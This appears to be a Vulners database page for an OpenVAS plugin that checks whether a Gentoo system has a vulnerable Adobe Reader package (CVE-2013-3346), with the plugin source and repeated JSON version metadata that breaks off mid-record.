Search...

Gentoo Security Advisory GLSA 201309-10

2015-09-29T00:00:00

ID OPENVAS:1361412562310121024
Type openvas
Reporter Eero Volotinen
Modified 2018-10-26T00:00:00

Description

Gentoo Linux Local Security Checks GLSA 201309-10

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: glsa-201309-10.nasl 12128 2018-10-26 13:35:25Z cfischer $
#
# Gentoo Linux security check
#
# Authors:
# Eero Volotinen &lt;eero.volotinen@solinor.com&gt;
#
# Copyright:
# Copyright (c) 2015 Eero Volotinen, http://solinor.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.121024");
  script_version("$Revision: 12128 $");
  script_tag(name:"creation_date", value:"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)");
  script_tag(name:"last_modification", value:"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $");
  script_name("Gentoo Security Advisory GLSA 201309-10");
  script_tag(name:"insight", value:"An unspecified vulnerability exists in Adobe Reader.");
  script_tag(name:"solution", value:"Update the affected packages to the latest available version.");
  script_tag(name:"solution_type", value:"VendorFix");
  script_xref(name:"URL", value:"https://security.gentoo.org/glsa/201309-10");
  script_cve_id("CVE-2013-3346");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_tag(name:"qod_type", value:"package");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/gentoo", "ssh/login/pkg");
  script_category(ACT_GATHER_INFO);
  script_tag(name:"summary", value:"Gentoo Linux Local Security Checks GLSA 201309-10");
  script_copyright("Eero Volotinen");
  script_family("Gentoo Local Security Checks");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-gentoo.inc");

res = "";
report = "";

if((res=ispkgvuln(pkg:"app-text/acroread", unaffected: make_list("ge 9.5.5"), vulnerable: make_list("lt 9.5.5"))) != NULL) {
  report += res;
}

if(report != "") {
    security_message(data:report);
} else if (__pkg_match) {
    exit(99);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310121024", "bulletinFamily": "scanner", "title": "Gentoo Security Advisory GLSA 201309-10", "description": "Gentoo Linux Local Security Checks GLSA 201309-10", "published": "2015-09-29T00:00:00", "modified": "2018-10-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "reporter": "Eero Volotinen", "references": ["https://security.gentoo.org/glsa/201309-10"], "cvelist": ["CVE-2013-3346"], "type": "openvas", "lastseen": "2019-05-29T18:36:08", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "d4b17a0e0f830b280db150c2a4861b0de54ff0e9c7a1b00ca26568b3e4b353cf", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "2c746672350419172d2ce265689a1e41", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-04-09T11:30:47", "modified": "2018-04-06T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201309-10.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-04-09T11:30:47"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 1, "enchantments": {}, "hash": "4a4ce174154ea6e1ec0c13108a0aaa21aa92c214a7fd6b99c241402810214e63", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "4b2bff744590ab68fb488f63f2c691e6", "key": "sourceData"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "451ccf9b33cae434b1236ed7a06114ec", "key": "modified"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2017-07-02T21:12:35", "modified": "2016-11-15T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201309-10.nasl 4513 2016-11-15 09:37:48Z cfi $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 4513 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2016-11-15 10:37:48 +0100 (Tue, 15 Nov 2016) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"login/SSH/success\", \"ssh/login/gentoo\");\nscript_category(ACT_GATHER_INFO);\nscript_summary(\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2017-07-02T21:12:35"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 4, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "24f19a20771d8105fafdbe65704dd375b2ac4dbd3287183cd62bb1a1cf1e80e6", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "2c746672350419172d2ce265689a1e41", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-08-30T19:22:01", "modified": "2018-04-06T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201309-10.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 1}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:22:01"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10", "edition": 5, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "d4b17a0e0f830b280db150c2a4861b0de54ff0e9c7a1b00ca26568b3e4b353cf", "hashmap": [{"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "2c746672350419172d2ce265689a1e41", "key": "sourceData"}, {"hash": "4fb7fd6149697e74d091717ea3f1ca84", "key": "modified"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "0c617a5f20441a2b260dec4e0f367e48", "key": "description"}, {"hash": "accf15eb411ebbb334dce1b0882773ab", "key": "title"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-09-01T23:49:58", "modified": "2018-04-06T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "# OpenVAS Vulnerability Test\n# Description: Gentoo Linux security check\n# $Id: glsa-201309-10.nasl 9374 2018-04-06 08:58:12Z cfischer $\n\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\nif(description)\n {\nscript_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\nscript_version(\"$Revision: 9374 $\");\nscript_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\nscript_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:58:12 +0200 (Fri, 06 Apr 2018) $\");\nscript_name(\"Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10\");\nscript_tag(name: \"insight\", value: \"An unspecified vulnerability exists in Adobe Reader.\"); \nscript_tag(name : \"solution\", value : \"update software\");\nscript_tag(name : \"solution_type\", value : \"VendorFix\");\nscript_xref(name : \"URL\" , value : \"https://security.gentoo.org/glsa/201309-10\");\nscript_cve_id(\"CVE-2013-3346\");\nscript_tag(name:\"cvss_base\", value:\"10.0\");\nscript_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\nscript_tag(name:\"qod_type\", value:\"package\");\nscript_dependencies(\"gather-package-list.nasl\");\nscript_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\nscript_category(ACT_GATHER_INFO);\nscript_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks https://security.gentoo.org/glsa/201309-10\");\nscript_copyright(\"Eero Volotinen\");\nscript_family(\"Gentoo Local Security Checks\");\nexit(0);\n}\ninclude(\"revisions-lib.inc\");\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "title": "Gentoo Linux Local Check: https://security.gentoo.org/glsa/201309-10", "type": "openvas", "viewCount": 1}, "differentElements": ["modified", "sourceData", "title"], "edition": 5, "lastseen": "2018-09-01T23:49:58"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2013-3346"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Gentoo Linux Local Security Checks GLSA 201309-10", "edition": 7, "enchantments": {"dependencies": {"modified": "2018-10-29T12:38:56", "references": [{"idList": ["EDB-ID:30394"], "type": "exploitdb"}, {"idList": ["MACOSX_ADOBE_READER_APSB13-15.NASL", "ADOBE_READER_APSB13-15.NASL", "ADOBE_ACROBAT_APSB13-15.NASL", "REDHAT-RHSA-2013-0826.NASL", "GENTOO_GLSA-201309-10.NASL"], "type": "nessus"}, {"idList": ["THREATPOST:B27D20AA97E34E737FEFFB96CFD7603B"], "type": "threatpost"}, {"idList": ["ACROBAT_TOOLBUTTON"], "type": "canvas"}, {"idList": ["KLA10457"], "type": "kaspersky"}, {"idList": ["GLSA-201309-10"], "type": "gentoo"}, {"idList": ["CVE-2013-3346"], "type": "cve"}, {"idList": ["SSV:61170"], "type": "seebug"}, {"idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_TOOLBUTTON", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_TOOLBUTTON"], "type": "metasploit"}, {"idList": ["PACKETSTORM:124464", "PACKETSTORM:124463"], "type": "packetstorm"}, {"idList": ["1337DAY-ID-21684"], "type": "zdt"}, {"idList": ["ZDI-13-212"], "type": "zdi"}, {"idList": ["OPENVAS:1361412562310803617", "OPENVAS:1361412562310803616", "OPENVAS:1361412562310803614", "OPENVAS:1361412562310803615", "OPENVAS:1361412562310803613"], "type": "openvas"}, {"idList": ["THN:1EA4AB16D6C3A0518A078CC8C9304FA5"], "type": "thn"}]}, "score": {"value": 7.2, "vector": "NONE"}}, "hash": "8f362fd1b998098bedd58734c2c94faef8b7b53f601046c5082841a5974cd02f", "hashmap": [{"hash": "385d33352d9166a7843835ca90fab1b9", "key": "title"}, {"hash": "05e1264e7c2f04b9dbcb6d8d76e48585", "key": "pluginID"}, {"hash": "589c062b55f39e8ff43a33d236527a1f", "key": "sourceData"}, {"hash": "603158070a66cc5722533c98e069889d", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "fb0324d45b438a38fcb6b5615a2faac1", "key": "cvelist"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "923238ed79f5e9451dcfc84597907102", "key": "description"}, {"hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610", "key": "references"}, {"hash": "311fe06b3cf4192127ad9986f2239f2a", "key": "published"}, {"hash": "9b693da47adba5957bc32ade1e81b10f", "key": "modified"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}, {"hash": "bb3dbc0ecae053747a8a163af717a25f", "key": "reporter"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121024", "id": "OPENVAS:1361412562310121024", "lastseen": "2018-10-29T12:38:56", "modified": "2018-10-26T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "1361412562310121024", "published": "2015-09-29T00:00:00", "references": ["https://security.gentoo.org/glsa/201309-10"], "reporter": "Eero Volotinen", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201309-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201309-10\");\n script_tag(name:\"insight\", value:\"An unspecified vulnerability exists in Adobe Reader.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201309-10\");\n script_cve_id(\"CVE-2013-3346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201309-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "title": "Gentoo Security Advisory GLSA 201309-10", "type": "openvas", "viewCount": 3}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-10-29T12:38:56"}], "edition": 8, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "fb0324d45b438a38fcb6b5615a2faac1"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "923238ed79f5e9451dcfc84597907102"}, {"key": "href", "hash": "603158070a66cc5722533c98e069889d"}, {"key": "modified", "hash": "9b693da47adba5957bc32ade1e81b10f"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": "05e1264e7c2f04b9dbcb6d8d76e48585"}, {"key": "published", "hash": "311fe06b3cf4192127ad9986f2239f2a"}, {"key": "references", "hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610"}, {"key": "reporter", "hash": "bb3dbc0ecae053747a8a163af717a25f"}, {"key": "sourceData", "hash": "589c062b55f39e8ff43a33d236527a1f"}, {"key": "title", "hash": "385d33352d9166a7843835ca90fab1b9"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "d2b3fc47810108cf1003ee2d230c0bf847722766ff560bbdf8adb44a3a4d9fed", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3346"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201309-10.NASL", "REDHAT-RHSA-2013-0826.NASL", "MACOSX_ADOBE_READER_APSB13-15.NASL", "ADOBE_READER_APSB13-15.NASL", "ADOBE_ACROBAT_APSB13-15.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:30394"]}, {"type": "gentoo", "idList": ["GLSA-201309-10"]}, {"type": 